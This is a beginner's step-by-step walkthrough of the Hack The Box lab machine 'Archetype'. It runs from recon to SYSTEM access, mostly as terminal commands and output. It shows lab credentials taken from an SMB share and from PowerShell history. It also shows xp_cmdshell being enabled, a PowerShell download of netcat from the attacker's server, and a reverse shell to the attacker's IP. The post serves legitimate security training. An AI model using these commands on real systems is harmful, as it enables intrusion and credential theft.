The aim of this walkthrough is to provide help with the Archetype machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 2 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

TASK 1

Question: Which TCP port is hosting a database server?

We start our recon with a quick connection check.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ ping $rhost -c 4
PING 10.129.63.163 (10.129.63.163) 56(84) bytes of data.
64 bytes from 10.129.63.163: icmp_seq=1 ttl=127 time=12.0 ms
64 bytes from 10.129.63.163: icmp_seq=2 ttl=127 time=11.4 ms
64 bytes from 10.129.63.163: icmp_seq=3 ttl=127 time=11.7 ms
64 bytes from 10.129.63.163: icmp_seq=4 ttl=127 time=11.4 ms

--- 10.129.63.163 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 11.352/11.636/12.018/0.265 ms
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

Then we follow up on it with scanning the top 1000 tcp ports(version and script scan).

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nmap -sC -sV $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 14:33 BST
Nmap scan report for 10.129.63.163
Host is up (0.057s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2023-05-11T13:33:22+00:00; +1s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-05-11T13:25:34
|_Not valid after:  2053-05-11T13:25:34
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m00s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-05-11T06:33:14-07:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-11T13:33:16
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Four ports are reported to be open on our target. Additionally, there are some other interesting pieces of information to take note of:

  • OS:Microsoft Windows
  • sql server running on tcp port 1433
  • guest login is enabled for port 445 (smb)

Let us capitalize on this information.

1433

TASK 2

Question: What is the name of the non-Administrative share available over SMB?

Using the guest username (guest-access) and listing the shares available on smb will directs us toward the backups share.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest -L $rhost
Password for [WORKGROUP\guest]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

backups

TASK 3

Question: What is the password identified in the file on the SMB share?

Accessing the share and listing it’s contents brings us to the - prod.dtsConfig - file.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\backups
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 12:20:57 2020
  ..                                  D        0  Mon Jan 20 12:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020

		5056511 blocks of size 4096. 2531250 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (12.1 KiloBytes/sec) (average 12.1 KiloBytes/sec)
smb: \> exit

After the download is finished, opening it on our local machine will bring us a nice surprise.

┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ cat prod.dtsConfig 
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$

Even though it looks like some configuration file, there are some potential credentials hidden there.

potential credentials
hostARCHETYPE
usernamesql_svc
passwordM3g4c0rp123

But since proper recon is always the key, we make sure to check out the other shares too, even if they do not look that interesting at first sight.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\ADMIN$
Password for [WORKGROUP\guest]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\IPC$
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

We were right, nothing interesting there. But still, it never hurts to check.

M3g4c0rp123

TASK 4

Question: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

Once we have Impacket installed, using the tab-autocomplete feature can help us out.

[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-
impacket-addcomputer        impacket-lookupsid          impacket-rpcmap
impacket-atexec             impacket-mimikatz           impacket-sambaPipe
impacket-dcomexec           impacket-mqtt_check         impacket-samrdump
impacket-dpapi              impacket-mssqlclient        impacket-secretsdump
impacket-esentutl           impacket-mssqlinstance      impacket-services
impacket-exchanger          impacket-netview            impacket-smbclient
impacket-findDelegation     impacket-nmapAnswerMachine  impacket-smbexec
impacket-GetADUsers         impacket-ntfs-read          impacket-smbrelayx
impacket-getArch            impacket-ntlmrelayx         impacket-smbserver
impacket-GetNPUsers         impacket-ping               impacket-sniff
impacket-getPac             impacket-ping6              impacket-sniffer
impacket-getST              impacket-psexec             impacket-split
impacket-getTGT             impacket-raiseChild         impacket-ticketConverter
impacket-GetUserSPNs        impacket-rdp_check          impacket-ticketer
impacket-goldenPac          impacket-reg                impacket-wmiexec
impacket-karmaSMB           impacket-registry-read      impacket-wmipersist
impacket-kintercept         impacket-rpcdump            impacket-wmiquery
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-

Therefore, it will come down to these noteworthy fellows:

  • impacket-mssqlclient
  • impacket-mssqlinstance

Checking them both out should make our choice quite easy.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-mssqlclient --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                      [-dc-ip ip address]
                      target

TDS client implementation (SSL supported).

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            show this help message and exit
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON
  -file FILE            input file with commands to execute in the SQL shell

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file
                        (KRB5CCNAME) based on target parameters. If valid credentials cannot
                        be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain
                        part (FQDN) specified in the target parameter
                       
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$impacket-mssqlinstance --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

usage: mssqlinstance.py [-h] [-timeout TIMEOUT] host

Asks the remote host for its running MSSQL Instances.

positional arguments:
  host              target host

optional arguments:
  -h, --help        show this help message and exit
  -timeout TIMEOUT  timeout to wait for an answer
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Since we already have the credentials, let’s try and connect to it. It is important to note, that without the -windows-auth optional argument our connection will not work.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@$rhost -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 

mssqlclient.py

TASK 5

Question: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

Using the built-in help command in our authenticated sql session should shine a light on our answer.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL>

Trying to get some more information about what the xp_cmdshell command exactly does is a bust, but it does provide us with some further hints.

SQL> xp_cmdshell help
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL>

Breaking it down, it looks like it wanted to directly run the help as a command, but it was stopped, because the feature is not yet turned on. Enabling it sounds like a good idea, so let’s try it.

enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>

Great, it looks like it actually worked and we could turn it on. Let’s try and run whoami and see if it runs.

SQL> xp_cmdshell whoami
output              
-----------------   
archetype\sql_svc   

NULL                

SQL>

Wow, it worked. But where are we exactly?

SQL> xp_cmdshell echo %cd%
output                
-------------------   
C:\Windows\system32   

NULL                  

SQL> 

What else can we run? Can we just grab the user flag from here directly?

SQL> xp_cmdshell "powershell cat C:\Users\sql_svc\Desktop\user.txt"
output                             
--------------------------------   
<flag>   

NULL                               

SQL>

Actually, we can and we just did. But communicating with our target this way (via the interactive sql shell) is quite cumbersome. So our next course of action should be to get a reverse shell on the target.

In a nutshell, it could look something like this:

  1. making netcat binary available on lhost (local machine)
  2. using the interactive sql terminal to download this binary to the target machine
  3. creating a netcat listener on lhost
  4. runing the netcat binary on the target via the interactive sql shell to connect back to lhost

So let’s start with #1: Our first action should be to download the windows netcat binary (nc64.exe) and store it on our local machine.

Running the server module from the http pyhton package (in the same directory) will start a local server and make all the files in that directory accessible.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ ll
total 48K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 45K May 11 16:20 nc64.exe
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...

Continuing with #2: We go back to our interactive sql shell. Then we try downloading the binary using both powershell and wget (previously alias for Invoke-WebRequest).

Our first attempt is to download the file (from our current directory) and then save it to - C:\Users\sql_svc\Downloads - (where we have write access), but we get an error…

SQL> xp_cmdshell "powershell -c wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downloads"
output                                                                             
--------------------------------------------------------------------------------   
wget : Access to the path 'C:\Users\sql_svc\Downloads' is denied.                  

At line:1 char:1                                                                   

+ wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downl ...        

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~            

    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], UnauthorizedAccessException   

    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand   

                                                                                   

NULL                                                                               

SQL>

In our second attempt, we first head to - C:\Users\sql_svc\Downloads - and only after we changed directory, do we try to download the binary.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.46:4444/nc64.exe -outfile nc64.exe"
output   
------   
NULL     

SQL>

This time we are successful and our binary is located at - C:\Users\sql_svc\Downloads\nc64.exe -.

SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

NULL                                                                               

    Directory: C:\Users\sql_svc\Downloads                                          

NULL                                                                               

NULL                                                                               

Mode                LastWriteTime         Length Name                                                                     

----                -------------         ------ ----                                                                     

-a----        5/11/2023   8:57 AM          45272 nc64.exe                                                                 

NULL                                                                               

NULL                                                                               

NULL                                                                               

SQL>

We shut down the http server right after the download has finished.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 16:56:39] "GET /nc64.exe HTTP/1.1" 200 -
10.129.63.163 - - [11/May/2023 16:57:33] "GET /nc64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Now for #3: It’s time to start our listener.

# on lhost
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Finally (#4): We try to run the netcat binary on the target and instruct it to connect back to our local machine.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.46 4444"

No output here. Did it work…? Once we head over to the listener from #3, we will see that we got a reverse shell back. So it actually worked.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.163.
Ncat: Connection from 10.129.63.163:49680.
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>

Let’s use our new (and much better) connection to grab the user flag (again).

C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc

C:\Users\sql_svc\Downloads>cd ..\Desktop\
cd ..\Desktop\

C:\Users\sql_svc\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,711,236,608 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
<flag>
C:\Users\sql_svc\Desktop>

xp_cmdshell

TASK 6

Question: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

One of the most commonly used scripts for privilege escalation on windows is winpeas.

Let bring it over to our target. We go through the same motions as before:

  • pyhton http server where the file is located at - lhost
  • use powershell and wget to copy it over - rhost

Since winpeas is already downloaded to pwnbox, locating it seems like the only thing still left for us to do. It might take some time, but it can be found at

/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe

Then, we copy it over to our working directory.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$ cp winPEASx64.exe ~/archetype/
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$

Once there, we head over and start our http server.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$ cd ~/archetype/
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...

Then we use our reverse shell to download it to rhost.

C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe

C:\Users\sql_svc\Downloads>

Once downloaded, we close up the http server.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 18:06:33] "GET /winPEASx64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

All that’s left for us is to run it.

C:\Users\sql_svc\Downloads>powershell -c .\winPEASx64.exe
powershell -c .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
             *((,.,/((((((((((((((((((((/,  */               
      ,/*,..*((((((((((((((((((((((((((((((((((,           
    ,*/((((((((((((((((((/,  .*//((//**, .*(((((((*       
    ((((((((((((((((**********/########## .(* ,(((((((   
    (((((((((((/********************/####### .(. (((((((
    ((((((..******************/@@@@@/***/###### ./(((((((
    ,,....********************@@@@@@@@@@(***,#### .//((((((
    , ,..********************/@@@@@%@@@@/********##((/ /((((
    ..((###########*********/%@@@@@@@@@/************,,..((((
    .(##################(/******/@@@@@/***************.. /((
    .(#########################(/**********************..*((
    .(##############################(/*****************.,(((
    .(###################################(/************..(((
    .(#######################################(*********..(((
    .(#######(,.***.,(###################(..***.*******..(((
    .(#######*(#####((##################((######/(*****..(((
    .(###################(/***********(##############(...(((
    .((#####################/*******(################.((((((
    .(((############################################(..((((
    ..(((##########################################(..(((((
    ....((########################################( .(((((
    ......((####################################( .((((((
    (((((((((#################################(../((((((
        (((((((((/##########################(/..((((((
              (((((((((/,.  ,*//////*,. ./(((((((((((((((.
                 (((((((((((((((((((((((((((((/

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

  WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)

       /---------------------------------------------------------------------------\
       |                             Do you like PEASS?                            |
       |---------------------------------------------------------------------------| 
       |         Become a Patreon    :     https://www.patreon.com/peass           |
       |         Follow on Twitter   :     @carlospolopm                           |
       |         Respect on HTB      :     SirBroccoli & makikvues                 |
       |---------------------------------------------------------------------------|
       |                                 Thank you!                                |
       \---------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

� You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
   Creating Dynamic lists, this could take a while, please wait...
   - Loading YAML definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
   - Creating current user groups list...
   - Creating active users list (local only)...
   - Creating disabled users list...
   - Admin users list...
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


�����������������������������������͹ System Information �������������������������������������

����������͹ Basic System Information
� Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
    Hostname: Archetype
    ProductName: Windows Server 2019 Standard
    EditionID: ServerStandard
    ReleaseId: 1809
    BuildBranch: rs5_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-08:00) Pacific Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 5/11/2023 10:08:59 AM
    HighIntegrity: False
    PartOfDomain: False
    Hotfixes: KB5004335, KB5003711, KB5004244, 

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
 [*] OS Version: 1809 (17763)
 [*] Enumerating installed KBs...
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/

 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc

 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

 [*] Finished. Found 12 potential vulnerabilities.

...
...
...

����������͹ Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT

����������͹ Analyzing Other Windows Files Files (limit 70)

       /---------------------------------------------------------------------------\
       |                             Do you like PEASS?                            |
       |---------------------------------------------------------------------------| 
       |         Become a Patreon    :     https://www.patreon.com/peass           |
       |         Follow on Twitter   :     @carlospolopm                           |
       |         Respect on HTB      :     SirBroccoli & makikvues                 |
       |---------------------------------------------------------------------------|
       |                                 Thank you!                                |
       \---------------------------------------------------------------------------/


C:\Users\sql_svc\Downloads>

winpeas

TASK 7

Question: What file contains the administrator’s password?

The output from winPEAS is quite lengthly (only a snippet is shown in TASK6), but one of the last lines mentioned the location of the powershell history file.

...
����������͹ Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
...

Checking it will lead us to some administrator credentials.

C:\Users\sql_svc\Downloads>type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

C:\Users\sql_svc\Downloads>

ConsoleHost_history.txt

SUBMIT FLAG

Question: Submit user flag

In TASK5 we used two different approaches to grab the user flag.

flag

SUBMIT FLAG

Question: Submit root flag

We can use the

admin credentials
usernameadministrator
passwordMEGACORP_4dm1n!!

found in TASK7 to get an admin shell on the target. Using psexec from impacket will land us system privileges.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.129.63.163.....
[*] Found writable share ADMIN$
[*] Uploading file ZUxKInhO.exe
[*] Opening SVCManager on 10.129.63.163.....
[*] Creating service EEnc on 10.129.63.163.....
[*] Starting service EEnc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Windows>

These high-level privileges provide us with access to the administrator’s desktop - C:\Windows>cd C:\Users\Administrator\Desktop - This is where our root flag resides.

C:\Windows>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,689,736,704 bytes free
C:\Users\Administrator\Desktop>

All left for now is to grab the root flag and terminate the connection.

C:\Users\Administrator\Desktop>type root.txt
<flag>
C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.129.63.163.....
[*] Stopping service EEnc.....
[*] Removing service EEnc.....
